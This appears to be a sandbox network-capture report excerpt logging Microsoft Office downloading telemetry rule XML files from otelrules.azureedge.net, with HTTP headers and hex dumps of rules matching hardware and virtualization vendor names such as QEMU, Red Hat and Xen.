                                                                                                                                            2024-10-31 16:13:12 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            78192.168.2.44983513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:12 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:12 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 469
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                            x-ms-request-id: 3c311aa7-c01e-008e-22a5-2a7381000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161312Z-159b85dff8fx9jp8hC1DFWp25400000001pg000000006gzr
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:12 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            79192.168.2.44983713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:12 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:12 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 472
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                            x-ms-request-id: e1f5471d-e01e-0051-4f6c-2784b2000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161312Z-15b8d89586f989rkwt13xern5400000005300000000077th
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:13 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            80192.168.2.44983613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:12 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:12 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 416
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                            x-ms-request-id: 08cfea9b-401e-0016-38cc-2a53e0000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161312Z-159b85dff8f2qnk7hC1DFWwb2400000002d000000000c8df
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:12 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            81192.168.2.44983813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:12 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:13 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 432
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                            x-ms-request-id: 927ac0b1-901e-0083-7fcc-2abb55000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161313Z-159b85dff8f2qnk7hC1DFWwb2400000002p0000000001619
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:13 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            82192.168.2.44983913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:12 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:13 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 475
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                            x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161313Z-16849878b7867ttgfbpnfxt44s00000009p000000000b4rb
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:13 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            83192.168.2.44984013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:13 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:13 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 427
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                            x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161313Z-16849878b78q9m8bqvwuva4svc000000087000000000sgk7
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:13 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            84192.168.2.44984113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:13 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:13 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 474
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                            x-ms-request-id: e6885a93-401e-0078-5ec2-2a4d34000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161313Z-17c5cb586f6zcqf8r7the4ske000000001zg00000000n28v
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            85192.168.2.44984213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:13 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:13 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 419
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                            x-ms-request-id: 951c16f0-d01e-002b-20ad-2a25fb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161313Z-17c5cb586f6r59nt4rzfbx40ys0000000220000000005qyy
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            86192.168.2.44984413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:13 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:13 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 405
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                            x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161313Z-16849878b786fl7gm2qg4r5y700000000a400000000033rk
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:13 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            87192.168.2.44984313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:13 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:13 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 472
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                            x-ms-request-id: 37a25f3a-c01e-00ad-392a-2ba2b9000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161313Z-159b85dff8fprglthC1DFW8zcg00000001p0000000005b8r
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
